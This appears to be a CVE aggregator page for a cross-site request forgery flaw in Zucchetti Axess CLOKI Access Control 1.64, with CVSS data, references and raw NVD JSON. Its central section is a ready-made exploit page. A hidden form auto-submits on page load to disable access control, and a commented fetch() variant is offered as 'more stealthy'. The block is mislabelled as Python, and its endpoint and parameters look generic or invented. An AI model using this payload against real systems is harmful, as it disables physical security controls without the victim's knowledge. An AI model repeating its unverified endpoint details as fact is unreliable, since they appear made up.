CVE-2021-47722

Description

Zucchetti Axess CLOKI Access Control 1.64 contains a cross-site request forgery vulnerability that allows attackers to manipulate access control settings without user interaction. Attackers can craft malicious web pages with hidden forms to disable or modify access control parameters by tricking authenticated users into loading the page.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Zucchetti Axess CLOKI Access Control 1.64

可能影响更低版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2021-47722 - Zucchetti Axess CLOKI Access Control -->
<!-- This PoC demonstrates how an attacker can manipulate access control settings -->
<!DOCTYPE html>
<html>
<head>
    <title>Access Control Settings Update</title>
</head>
<body>
    <h1>Page Loading...</h1>
    <!-- Hidden form to modify access control settings -->
    <form id="csrfForm" action="https://target-server/axess-cloki/api/access-control/update" method="POST" style="display:none;">
        <!-- Disable access control -->
        <input type="hidden" name="access_control_enabled" value="false">
        <input type="hidden" name="security_level" value="0">
        <input type="hidden" name="action" value="disable_protection">
        <!-- CSRF Token (if implementation exists) - placeholder -->
        <input type="hidden" name="csrf_token" value="attacker_controlled_or_empty">
    </form>

    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
        
        // Alternative: Use fetch API for more stealthy attack
        /*
        fetch('https://target-server/axess-cloki/api/access-control/update', {
            method: 'POST',
            mode: 'no-cors',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            body: 'access_control_enabled=false&security_level=0&action=disable_protection'
        });
        */
    </script>
    
    <p>If you see this message, the attack may have failed.</p>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47722
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47722
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47722/
[4] VulDB https://vuldb.com/cve/CVE-2021-47722
[5] https://www.axesstmc.com
[6] https://www.exploit-db.com/exploits/50595
[7] https://www.vulncheck.com/advisories/zucchetti-axess-cloki-access-control-cross-site-request-forgery
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47722", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:44.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zucchetti Axess CLOKI Access Control 1.64 contains a cross-site request forgery vulnerability that allows attackers to manipulate access control settings without user interaction. Attackers can craft malicious web pages with hidden forms to disable or modify access control parameters by tricking authenticated users into loading the page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://www.axesstmc.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50595", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zucchetti-axess-cloki-access-control-cross-site-request-forgery", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php", "source": "[email protected]"}]}}